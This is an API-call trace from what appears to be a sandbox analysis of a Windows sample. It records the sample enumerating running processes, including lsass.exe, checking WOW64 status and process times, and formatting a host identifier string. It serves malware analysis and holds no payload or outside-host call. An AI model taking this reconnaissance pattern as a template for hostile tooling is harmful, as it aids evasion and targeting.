	[0128.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.502] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.502] CloseHandle (hObject=0x2dc) returned 1
	[0128.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.502] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.502] CloseHandle (hObject=0x2dc) returned 1
	[0128.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.502] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.502] CloseHandle (hObject=0x2dc) returned 1
	[0128.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.503] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.503] CloseHandle (hObject=0x2dc) returned 1
	[0128.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.539] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.539] CloseHandle (hObject=0x2dc) returned 1
	[0128.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.540] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.540] CloseHandle (hObject=0x2dc) returned 1
	[0128.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.541] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.541] CloseHandle (hObject=0x2dc) returned 1
	[0128.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.541] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.541] CloseHandle (hObject=0x2dc) returned 1
	[0128.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.542] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.542] CloseHandle (hObject=0x2dc) returned 1
	[0128.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.542] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.542] CloseHandle (hObject=0x2dc) returned 1
	[0128.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.542] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.542] CloseHandle (hObject=0x2dc) returned 1
	[0128.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.543] CloseHandle (hObject=0x2dc) returned 1
	[0128.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.543] CloseHandle (hObject=0x2dc) returned 1
	[0128.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.544] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.544] CloseHandle (hObject=0x2dc) returned 1
	[0128.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.544] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.544] CloseHandle (hObject=0x2dc) returned 1
	[0128.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.545] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.545] CloseHandle (hObject=0x2dc) returned 1
	[0128.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.545] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.545] CloseHandle (hObject=0x2dc) returned 1
	[0128.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.546] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.546] CloseHandle (hObject=0x2dc) returned 1
	[0128.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.546] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.546] CloseHandle (hObject=0x2dc) returned 1
	[0128.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.546] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.546] CloseHandle (hObject=0x2dc) returned 1
	[0128.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.547] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.547] CloseHandle (hObject=0x2dc) returned 1
	[0128.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.547] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.547] CloseHandle (hObject=0x2dc) returned 1
	[0128.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.548] CloseHandle (hObject=0x2dc) returned 1
	[0128.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.548] CloseHandle (hObject=0x2dc) returned 1
	[0128.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.549] CloseHandle (hObject=0x2dc) returned 1
	[0128.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.549] CloseHandle (hObject=0x2dc) returned 1
	[0128.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.549] CloseHandle (hObject=0x2dc) returned 1
	[0128.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.550] CloseHandle (hObject=0x2dc) returned 1
	[0128.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.550] CloseHandle (hObject=0x2dc) returned 1
	[0128.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.551] CloseHandle (hObject=0x2dc) returned 1
	[0128.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.551] CloseHandle (hObject=0x2dc) returned 1
	[0128.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.551] CloseHandle (hObject=0x2dc) returned 1
	[0128.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.552] CloseHandle (hObject=0x2dc) returned 1
	[0128.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.552] CloseHandle (hObject=0x2dc) returned 1
	[0128.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.553] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.554] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.554] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.554] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
